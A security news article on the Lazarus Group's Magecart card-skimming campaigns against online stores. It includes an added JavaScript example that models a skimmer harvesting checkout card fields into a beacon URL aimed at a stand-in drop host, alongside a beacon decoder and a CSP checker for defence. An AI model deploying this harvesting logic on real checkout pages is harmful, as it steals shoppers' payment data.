Hidden Cobra's links to digital skimming activities revealed

North Korean hackers linked to Magecart web skimming attacks, according to the latest report

Security firm Sansec has revealed e-skimming campaigns linked to the North Korean state-sponsored hacker group.

North Korean state-sponsored hackers have widened their scope from cryptocurrency exchange hacks and ransomware deployment to online stores.[1] Reports show that the Lazarus Group, also tracked as Hidden Cobra, is using web skimming techniques against US and European shoppers.[2] According to Sansec's[3] analysis, the group began breaking into online stores and planting payment skimmers as early as May 2019.

These state-sponsored hackers are known for ransomware distribution, cryptocurrency market operations, and other malicious activities that have earned them more than $2 billion.[4] Further analysis of the recent attacks revealed that they have extended their criminal portfolio to digital skimming. Infrastructure from earlier Hidden Cobra operations was reused, and that overlap indicates the intrusions were carried out by the same group.

Distinctive patterns in the malware code linked multiple hacks to the same actor.

Various sites were used to run the global skimming campaign

Because these operations require gaining access to e-commerce servers and related resources, they demand a degree of skill from the attackers. The malicious code runs on the checkout page and silently logs credit card details as customers enter them into the checkout form. Once collected, the data is exfiltrated to a remote server, where the attackers gather the stolen information to use themselves or to sell on dark web markets.

The report revealed that the websites of an Italian modeling agency, a bookstore in New Jersey, a vintage music store in Tehran, and others were used to run the e-commerce skimming campaign. The attackers also built a global exfiltration network: legitimate sites were hijacked and repurposed to disguise the data exfiltration traffic.

The stolen information ended up on servers with IP addresses that these North Korean hackers had used before. The group goes by different names, Lazarus Group or Hidden Cobra, because the US Department of Homeland Security and other investigators named it independently. Whatever the name, the evidence points to the same group.

Digital skimming continues to grow as a type of fraud

Once the attacker has access to a retailer's server, a Magecart script is injected into the checkout page. The skimmer collects whatever customers enter at that point, so credit card numbers and other details are easily exfiltrated. Such information is extremely valuable on the dark web, so the popularity of these attacks is rising quickly.
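The following block is an added example, not code from the original article or from Sansec's report. It models the checkout skimmer described in this section and in the earlier one: a script that picks the payment fields out of a submitted form, encodes them, and fires an image beacon to a drop server. It then shows the check a browser applies under a Content-Security-Policy, which is the control that decides whether that beacon ever leaves the page. The form fields, the victim store origin (shop.example.com), the drop host (collector.example.net) and the policies are all constructed for illustration; nothing here performs a network request, and the CSP matcher is a simplified version of the real source-list rules.

```javascript
// Added example (not from the article or Sansec): a Magecart-style skimmer model
// plus a simplified CSP source-list check. Runs offline under Node.js; sends nothing.

// Constructed checkout form, modelled as field name -> value instead of DOM nodes.
const SAMPLE_CHECKOUT_FORM = {
  name: 'Jane Example',
  cc_number: '4111111111111111', // well-known test card number, not a real card
  cc_exp: '12/26',
  cc_cvv: '123',
  address: '1 Example Street',
};

// Field names a skimmer typically harvests from a checkout form.
const CARD_FIELD_PATTERN = /card|cc|cvv|cvc|exp|pan/i;

// What the skimmer does at submit time: select the payment fields, base64-encode
// them, and build the URL of an image beacon to the (hypothetical) drop server.
function buildBeaconUrl(form, dropOrigin = 'https://collector.example.net') {
  const stolen = {};
  for (const [field, value] of Object.entries(form)) {
    if (CARD_FIELD_PATTERN.test(field)) stolen[field] = value;
  }
  const blob = Buffer.from(JSON.stringify(stolen)).toString('base64');
  return `${dropOrigin}/pixel.gif?d=${encodeURIComponent(blob)}`;
}

// Reverse the encoding: useful when analysing a beacon captured in proxy or web logs.
function decodeBeaconUrl(url) {
  const d = new URL(url).searchParams.get('d');
  return JSON.parse(Buffer.from(d, 'base64').toString('utf8'));
}

// Simplified CSP evaluation: may a request from pageOrigin reach url under the given
// directive (img-src for image beacons, connect-src for fetch/XHR)? Falls back to
// default-src when the directive is absent. Supports 'none', 'self', '*', scheme
// sources (https:) and host sources with an optional "*." wildcard and port.
function cspAllows(policy, directive, url, pageOrigin) {
  const directives = {};
  for (const part of policy.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/);
    if (name) directives[name.toLowerCase()] = sources;
  }
  const sources = directives[directive] || directives['default-src'];
  if (!sources) return true; // neither the directive nor default-src is set: unrestricted
  const target = new URL(url);
  const page = new URL(pageOrigin);
  return sources.some((raw) => {
    const s = raw.replace(/^'|'$/g, '').toLowerCase();
    if (s === 'none') return false;
    if (s === 'self') return target.origin === page.origin;
    if (s === '*') return true;
    if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return target.protocol === s; // scheme source
    const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/]+)(?::(\d+|\*))?$/.exec(s);
    if (!m) return false;
    const [, scheme, wildcard, host, port] = m;
    if (scheme && target.protocol !== `${scheme}:`) return false;
    const effectivePort = target.port || (target.protocol === 'https:' ? '443' : '80');
    if (port && port !== '*' && effectivePort !== port) return false;
    return wildcard ? target.hostname.endsWith(`.${host}`) : target.hostname === host;
  });
}

// Demonstration on the constructed data.
const demoPage = 'https://shop.example.com'; // constructed victim store origin
const demoBeacon = buildBeaconUrl(SAMPLE_CHECKOUT_FORM);
console.log('beacon the skimmer would fire:', demoBeacon);
console.log('fields it carries:', decodeBeaconUrl(demoBeacon));
console.log("img-src 'self' blocks it:", !cspAllows("default-src 'self'", 'img-src', demoBeacon, demoPage));
console.log('img-src https: lets it through:', cspAllows("default-src 'self'; img-src https:", 'img-src', demoBeacon, demoPage));
```

The last line is the caveat that matters for the hijacked legitimate sites described above: a policy that allows `https:` or `*` for `img-src`/`connect-src` lets the beacon reach any HTTPS host, including a compromised but otherwise reputable domain, so only an explicit host allowlist (or `'self'`) actually stops this exfiltration path. Decoding beacons with `decodeBeaconUrl` is the same step an investigator performs on suspicious outbound requests found in proxy logs.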

Magecart[5] is a digital skimming method, a type of fraud that intercepts credit card data during online purchases. In many cases, the hackers running such operations have been Russian or Indonesian. Since 2015, however, hackers from various countries have tried to profit using these methods.

Hidden Cobra had already drawn attention for modifying the store code of the fashion chain Claire's.[6] The attackers used spearphishing to obtain staff passwords. Unfortunately, no further details about this particular attack have been published.

About the author
Ugnius Kiguolis

Ugnius Kiguolis is a professional malware analyst who is also the founder and owner of 2-Spyware. He currently serves as Editor-in-chief.
